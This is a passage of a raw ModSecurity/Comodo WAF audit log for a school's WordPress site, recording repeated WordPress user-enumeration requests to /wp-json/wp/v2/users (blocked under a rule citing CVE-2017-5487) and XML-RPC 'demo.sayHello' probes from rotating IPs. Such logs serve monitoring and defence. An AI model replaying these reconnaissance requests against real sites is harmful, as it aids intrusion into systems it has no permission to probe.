"TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497311595491 5401 (- - -) Stopwatch2: 1747497311595491 5401; combined=4283, p1=496, p2=3556, p3=34, p4=35, p5=95, sr=72, sw=67, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ac76a028-Z-- --9e76d113-A-- [17/May/2025:22:55:49 +0700] aCixhQTOsBn9MSWb6WLSrgAAAJI 103.236.140.4 45712 103.236.140.4 8181 --9e76d113-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 139.224.104.57 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 139.224.104.57 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --9e76d113-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --9e76d113-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497349895208 2378 (- - -) Stopwatch2: 1747497349895208 2378; combined=1035, p1=359, p2=652, p3=0, p4=0, p5=24, sr=63, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --9e76d113-Z-- --71837f03-A-- [17/May/2025:22:56:12 +0700] aCixnBKi5m5upc8uMd4ZTQAAANE 103.236.140.4 46176 103.236.140.4 8181 --71837f03-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.20 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --71837f03-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71837f03-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497372137768 2475 (- - -) Stopwatch2: 1747497372137768 2475; combined=1150, p1=385, p2=739, p3=0, p4=0, p5=26, sr=56, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71837f03-Z-- --e9aa0466-A-- [17/May/2025:22:56:17 +0700] aCixoXyxdQCiyU1ENFejGQAAABA 103.236.140.4 46408 103.236.140.4 8181 --e9aa0466-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.104.20 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.104.20 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --e9aa0466-C-- demo.sayHello --e9aa0466-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --e9aa0466-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497377721277 5467 (- - -) Stopwatch2: 1747497377721277 5467; combined=4244, p1=568, p2=3359, p3=36, p4=38, p5=135, sr=75, sw=108, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e9aa0466-Z-- --320f4463-A-- [17/May/2025:22:56:51 +0700] aCixwxKi5m5upc8uMd4aFgAAANI 103.236.140.4 48150 103.236.140.4 8181 --320f4463-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.81 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --320f4463-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --320f4463-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497411804379 2859 (- - -) Stopwatch2: 1747497411804379 2859; combined=1211, p1=404, p2=781, p3=0, p4=0, p5=26, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --320f4463-Z-- --4d106773-A-- [17/May/2025:22:56:58 +0700] aCixyum4kjNN-hEbWjKjYQAAAEo 103.236.140.4 48496 103.236.140.4 8181 --4d106773-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.60.81 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.60.81 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4d106773-C-- demo.sayHello --4d106773-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4d106773-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497418600910 7356 (- - -) Stopwatch2: 1747497418600910 7356; combined=5609, p1=754, p2=4578, p3=50, p4=67, p5=97, sr=76, sw=63, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4d106773-Z-- --a46e4629-A-- [17/May/2025:22:57:17 +0700] aCix3QTOsBn9MSWb6WLURgAAAIk 103.236.140.4 49374 103.236.140.4 8181 --a46e4629-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.89 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --a46e4629-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a46e4629-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497437007998 2846 (- - -) Stopwatch2: 1747497437007998 2846; combined=1317, p1=437, p2=848, p3=0, p4=0, p5=31, sr=78, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a46e4629-Z-- --4ef91f5d-A-- [17/May/2025:22:57:26 +0700] aCix5nyxdQCiyU1ENFekmgAAAAc 103.236.140.4 49762 103.236.140.4 8181 --4ef91f5d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.94.89 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.94.89 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --4ef91f5d-C-- demo.sayHello --4ef91f5d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --4ef91f5d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497446621041 7108 (- - -) Stopwatch2: 1747497446621041 7108; combined=5464, p1=747, p2=4455, p3=52, p4=68, p5=86, sr=73, sw=56, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --4ef91f5d-Z-- --ce433b54-A-- [17/May/2025:23:00:23 +0700] aCiyl-m4kjNN-hEbWjKnQAAAAFM 103.236.140.4 57046 103.236.140.4 8181 --ce433b54-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.252 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.252 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --ce433b54-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ce433b54-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497623131251 2305 (- - -) Stopwatch2: 1747497623131251 2305; combined=1052, p1=340, p2=685, p3=0, p4=0, p5=27, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ce433b54-Z-- --71ceb76c-A-- [17/May/2025:23:00:28 +0700] aCiynOm4kjNN-hEbWjKnVgAAAEo 103.236.140.4 57298 103.236.140.4 8181 --71ceb76c-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.160 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --71ceb76c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71ceb76c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497628433234 2626 (- - -) Stopwatch2: 1747497628433234 2626; combined=1374, p1=440, p2=899, p3=0, p4=0, p5=35, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71ceb76c-Z-- --fada612d-A-- [17/May/2025:23:00:28 +0700] aCiynATOsBn9MSWb6WLZbgAAAII 103.236.140.4 57304 103.236.140.4 8181 --fada612d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.228.116.252 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.228.116.252 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --fada612d-C-- demo.sayHello --fada612d-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --fada612d-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497628513482 5433 (- - -) Stopwatch2: 1747497628513482 5433; combined=4034, p1=549, p2=3309, p3=37, p4=32, p5=66, sr=60, sw=41, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fada612d-Z-- --395ac440-A-- [17/May/2025:23:00:36 +0700] aCiypATOsBn9MSWb6WLZygAAAIM 103.236.140.4 57700 103.236.140.4 8181 --395ac440-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.87.160 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.87.160 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --395ac440-C-- demo.sayHello --395ac440-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --395ac440-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497636776944 5333 (- - -) Stopwatch2: 1747497636776944 5333; combined=4030, p1=542, p2=3270, p3=40, p4=32, p5=86, sr=56, sw=60, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --395ac440-Z-- --282eee58-A-- [17/May/2025:23:01:14 +0700] aCiyyum4kjNN-hEbWjKoDgAAAEE 103.236.140.4 59348 103.236.140.4 8181 --282eee58-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.147 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --282eee58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --282eee58-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497674620598 2518 (- - -) Stopwatch2: 1747497674620598 2518; combined=1089, p1=357, p2=709, p3=0, p4=0, p5=23, sr=52, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --282eee58-Z-- --475f066e-A-- [17/May/2025:23:01:21 +0700] aCiy0RKi5m5upc8uMd4fNwAAANQ 103.236.140.4 59632 103.236.140.4 8181 --475f066e-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.248.80.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.80.241 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --475f066e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --475f066e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497681631851 2473 (- - -) Stopwatch2: 1747497681631851 2473; combined=1324, p1=448, p2=836, p3=0, p4=0, p5=39, sr=74, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --475f066e-Z-- --c030ba21-A-- [17/May/2025:23:01:26 +0700] aCiy1um4kjNN-hEbWjKoLAAAAEU 103.236.140.4 59906 103.236.140.4 8181 --c030ba21-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.253.172.147 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.253.172.147 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --c030ba21-C-- demo.sayHello --c030ba21-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --c030ba21-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497686572908 5363 (- - -) Stopwatch2: 1747497686572908 5363; combined=4048, p1=561, p2=3278, p3=36, p4=38, p5=81, sr=62, sw=54, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c030ba21-Z-- --03fb8e7e-A-- [17/May/2025:23:01:26 +0700] aCiy1hKi5m5upc8uMd4fXQAAANQ 103.236.140.4 59924 103.236.140.4 8181 --03fb8e7e-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.248.80.241 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.248.80.241 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --03fb8e7e-C-- demo.sayHello --03fb8e7e-F-- HTTP/1.1 301 Moved Permanently Location: https://www.smkn22jakarta.sch.id/xmlrpc.php Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 --03fb8e7e-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||smkn22-jkt.sch.id|F|2"] [data "TX:0=text/plain"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1747497686898512 7808 (- - -) Stopwatch2: 1747497686898512 7808; combined=5984, p1=896, p2=4799, p3=50, p4=69, p5=108, sr=85, sw=62, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --03fb8e7e-Z-- --f123fc5b-A-- [17/May/2025:23:02:10 +0700] aCizAhKi5m5upc8uMd4gegAAAMo 103.236.140.4 33686 103.236.140.4 8181 --f123fc5b-B-- GET /wp-json/wp/v2/users HTTP/1.0 Referer: https://www.google.com Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.109 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 --f123fc5b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f123fc5b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747497730120313 3878 (- - -) Stopwatch2: 1747497730120313 3878; combined=2191, p1=646, p2=1492, p3=0, p4=0, p5=52, sr=75, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f123fc5b-Z-- --afdc0830-A-- [17/May/2025:23:02:17 +0700] aCizCem4kjNN-hEbWjKpDwAAAFE 103.236.140.4 34042 103.236.140.4 8181 --afdc0830-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 156.249.56.109 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 156.249.56.109 X-Forwarded-Proto: https Connection: close Content-Length: 136 Content-Type: text/plain; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.13 (Java/11.0.26) --afdc0830-C-- demo.sayHello --afdc0830-F-- 